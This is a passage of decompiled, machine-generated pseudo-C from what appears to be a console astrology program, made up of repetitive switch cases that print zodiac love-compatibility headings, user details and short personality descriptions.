																																_push("SCORPIUS AND GEMINI LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 0x1c;
																																__eax = E013D1B90(__ebx, 0x1c, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																															case 9:
																																L217:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																_push("SCORPIUS AND CANCER LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 0x25;
																																__eax = E013D1B90(__ebx, 0x25, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																															case 0xa:
																																L218:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																_push("SCORPIUS AND LEO LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 0x2d;
																																__eax = E013D1B90(__ebx, 0x2d, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																															case 0xb:
																																L219:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																_push("SCORPIUS AND VIRGO LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 0x34;
																																__eax = E013D1B90(__ebx, 0x34, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																															case 0xc:
																																L220:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																_push("SCORPIUS AND LIBRA LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 0x3a;
																																__eax = E013D1B90(__ebx, 0x3a, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																															case 0xd:
																																L221:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																_push("SCORPIUS AND SCORPIO LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 0x3f;
																																__eax = E013D1B90(__ebx, 0x3f, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																															case 0xe:
																																L222:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																_push("SCORPIUS AND SAGGITARIUS LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 0x43;
																																__eax = E013D1B90(__ebx, 0x43, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																															case 0xf:
																																L223:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																_push("SCORPIUS AND CAPRICORN LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 0x44;
																																__eax = E013D1B90(__ebx, 0x44, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																															case 0x10:
																																L224:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																_push("SCORPIUS AND AQUARIUS LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 0x45;
																																__eax = E013D1B90(__ebx, 0x45, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																															case 0x11:
																																L225:
																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
																																__edx = __esi;
																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																																_push("SCORPIUS AND PISCES LOVE COMPATIBILITY");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = 0x46;
																																__eax = E013D1B90(__ebx, 0x46, __edi);
																																__edx = _v16;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																_push(__edx);
																																L199();
																																__esp = 0x20 + __esp;
																																goto L227;
																														}
																														L227:
																														__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																														_push(__esi);
																														_push("Name: %s");
																														 *0x13fe250 = 0x30037;
																														__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																														__ecx = _v36;
																														_push(_v36);
																														_push("Age=%d");
																														 *0x13fe250 = 0x40037;
																														E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __bl;
																														 *0x13fe250 = 0x50037;
																														_push(E013DC111(__bl));
																														_push("Sex=%c");
																														__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																														__esp = 0x20 + __esp;
																														__eax = E013D1940();
																														_v44 = "\n*  You are usually filled with inherent contradiction.";
																														_v40 = "\n*  You generally become interested in occult matters.";
																														__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																														__eax = __eax - 1;
																														__eflags = __eax - 5;
																													} while (__eflags <= 0);
																													goto L228;
																												}
																												goto L500;
																											case 6:
																												L181:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__eax = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND ARIES LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 6;
																												E013D1B90(__ebx, 6, __edi) = _v0;
																												_push(_v0);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																											case 7:
																												L182:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__ecx = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND TAURUS LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x11;
																												__eax = E013D1B90(__ebx, 0x11, __edi);
																												__ecx = _v0;
																												_push(_v0);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																											case 8:
																												L183:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__edx = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND GEMINI LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x1b;
																												__eax = E013D1B90(__ebx, 0x1b, __edi);
																												__edx = _v0;
																												_push(__edx);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																											case 9:
																												L184:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__eax = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND CANCER LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x24;
																												E013D1B90(__ebx, 0x24, __edi) = _v0;
																												_push(_v0);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																											case 0xa:
																												L185:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__ecx = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND LEO LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x2c;
																												__eax = E013D1B90(__ebx, 0x2c, __edi);
																												__ecx = _v0;
																												_push(_v0);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																											case 0xb:
																												L186:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__edx = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND VIRGO LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x33;
																												__eax = E013D1B90(__ebx, 0x33, __edi);
																												__edx = _v0;
																												_push(__edx);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																											case 0xc:
																												L187:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__eax = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND LIBRA LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x39;
																												E013D1B90(__ebx, 0x39, __edi) = _v0;
																												_push(_v0);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																											case 0xd:
																												L188:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__ecx = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND SCORPIO LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x3a;
																												__eax = E013D1B90(__ebx, 0x3a, __edi);
																												__ecx = _v0;
																												_push(_v0);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																											case 0xe:
																												L189:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__edx = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND SAGGITARIUS LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x3b;
																												__eax = E013D1B90(__ebx, 0x3b, __edi);
																												__edx = _v0;
																												_push(__edx);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																											case 0xf:
																												L190:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__eax = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND CAPRICORN LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x3c;
																												E013D1B90(__ebx, 0x3c, __edi) = _v0;
																												_push(_v0);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																											case 0x10:
																												L191:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__ecx = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND AQUARIUS LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x3d;
																												__eax = E013D1B90(__ebx, 0x3d, __edi);
																												__ecx = _v0;
																												_push(_v0);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																											case 0x11:
																												L192:
																												E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
																												__edx = _v0;
																												__edx = __esi;
																												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx);
																												_push("LIBRA AND PISCES LOVE COMPATIBILITY");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx = 0x3e;
																												__eax = E013D1B90(__ebx, 0x3e, __edi);
																												__edx = _v0;
																												_push(__edx);
																												_push(__esi);
																												_push(__ebx);
																												_push(__edi);
																												L164();
																												__esp = 0x20 + __esp;
																												goto L194;
																										}
																										L194:
																										__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																										_push(__esi);
																										_push("Name: %s");
																										 *0x13fe250 = 0x30037;
																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																										__ecx = _v36;
																										_push(_v36);
																										_push("Age=%d");
																										 *0x13fe250 = 0x40037;
																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																										__ecx = _v40;
																										 *0x13fe250 = 0x50037;
																										_push(E013DC111(_v40));
																										_push("Sex=%c");
																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																										_push("Your horoscope sign is Libra-The Balance");
																										 *0x13fe250 = 0x20003;
																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																										_push("__");
																										 *0x13fe250 = 0x3000a;
																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																										_push("___.\'  \'.___");
																										 *0x13fe250 = 0x40005;
																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																										_push("____________\n\n");
																										 *0x13fe250 = 0x50005;
																										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																										__esp = 0x30 + __esp;
																										_v52 = "\n*  You are rarely lazy.";
																										_v48 = "\n*  You work hard, and also demand that your partners work just as hard.";
																										_v44 = "\n*  You have a strong sense of justice and fair play.";
																										__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																										__eax = __eax - 1;
																										__eflags = __eax - 5;
																									} while (__eflags <= 0);
																									_pop(__edi);
																									goto L196;
																								}
																								goto L500;
																							case 6:
																								L147:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND ARIES LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 5;
																								__eax = E013D1B90(__ebx, 5, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																							case 7:
																								L148:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND TAURUS LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x10;
																								__eax = E013D1B90(__ebx, 0x10, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																							case 8:
																								L149:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND GEMINI LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x1a;
																								__eax = E013D1B90(__ebx, 0x1a, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																							case 9:
																								L150:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND CANCER LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x23;
																								__eax = E013D1B90(__ebx, 0x23, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																							case 0xa:
																								L151:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND LEO LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x2b;
																								__eax = E013D1B90(__ebx, 0x2b, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																							case 0xb:
																								L152:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND VIRGO LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x32;
																								__eax = E013D1B90(__ebx, 0x32, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																							case 0xc:
																								L153:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND LIBRA LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x33;
																								__eax = E013D1B90(__ebx, 0x33, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																							case 0xd:
																								L154:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND SCORPIO LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x34;
																								__eax = E013D1B90(__ebx, 0x34, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																							case 0xe:
																								L155:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND SAGGITARIUS LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x35;
																								__eax = E013D1B90(__ebx, 0x35, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																							case 0xf:
																								L156:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND CAPRICORN LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x36;
																								__eax = E013D1B90(__ebx, 0x36, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																							case 0x10:
																								L157:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND AQUARIUS LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x37;
																								__eax = E013D1B90(__ebx, 0x37, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																							case 0x11:
																								L158:
																								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1850();
																								__edx = __esi;
																								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																								_push("VIRGO AND PISCES LOVE COMPATIBILITY");
																								 *0x13fe250 = 0xa0005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__edx = 0x38;
																								__eax = E013D1B90(__ebx, 0x38, __edi);
																								__edx = _v12;
																								_push(__ebx);
																								_push(__esi);
																								_push(__edi);
																								_push(__edx);
																								L131();
																								__esp = 0x20 + __esp;
																								goto L160;
																						}
																						L160:
																						__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																						_push(__esi);
																						_push("Name: %s");
																						 *0x13fe250 = 0x30037;
																						__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																						__ecx = _v32;
																						_push(_v32);
																						_push("Age=%d");
																						 *0x13fe250 = 0x40037;
																						E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __bl;
																						 *0x13fe250 = 0x50037;
																						_push(E013DC111(__bl));
																						_push("Sex=%c");
																						__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																						__esp = 0x20 + __esp;
																						__eax = E013D1850();
																						_v44 = "\nThe emblem of Virgo, a virgin holding sheaves of wheat in her hands symbolizes wisdom, garnered in the fields of experience.";
																						_v40 = "\n*  You are shy and idealistic.";
																						_v36 = "\n*  Disappointment can harden you into a cynic and a skeptic.";
																						__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																						__eax = __eax - 1;
																						__eflags = __eax - 5;
																					} while (__eflags <= 0);
																					goto L161;
																				}
																				goto L500;
																			case 6:
																				L113:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__eax = _a4;
																				__edx = __edi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND ARIES LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 4;
																				E013D1B90(__ebx, 4, __edi) = _a4;
																				_push(_a4);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 7:
																				L114:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__ecx = _a4;
																				__edx = __edi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND TAURUS LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0xf;
																				__eax = E013D1B90(__ebx, 0xf, __edi);
																				__ecx = _a4;
																				_push(_a4);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 8:
																				L115:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__edx = _a4;
																				__edx = __edi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND GEMINI LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x19;
																				__eax = E013D1B90(__ebx, 0x19, __edi);
																				__edx = _a4;
																				_push(__edx);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 9:
																				L116:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__eax = _a4;
																				__edx = __edi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND CANCER LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x22;
																				E013D1B90(__ebx, 0x22, __edi) = _a4;
																				_push(_a4);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xa:
																				L117:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__ecx = _a4;
																				__edx = __edi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND LEO LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x2a;
																				__eax = E013D1B90(__ebx, 0x2a, __edi);
																				__ecx = _a4;
																				_push(_a4);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xb:
																				L118:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__edx = _a4;
																				__edx = __edi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND VIRGO LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x2b;
																				__eax = E013D1B90(__ebx, 0x2b, __edi);
																				__edx = _a4;
																				_push(__edx);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xc:
																				L119:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__eax = _a4;
																				__edx = __edi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND LIBRA LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x2c;
																				E013D1B90(__ebx, 0x2c, __edi) = _a4;
																				_push(_a4);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xd:
																				L120:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__ecx = _a4;
																				__edx = __edi;
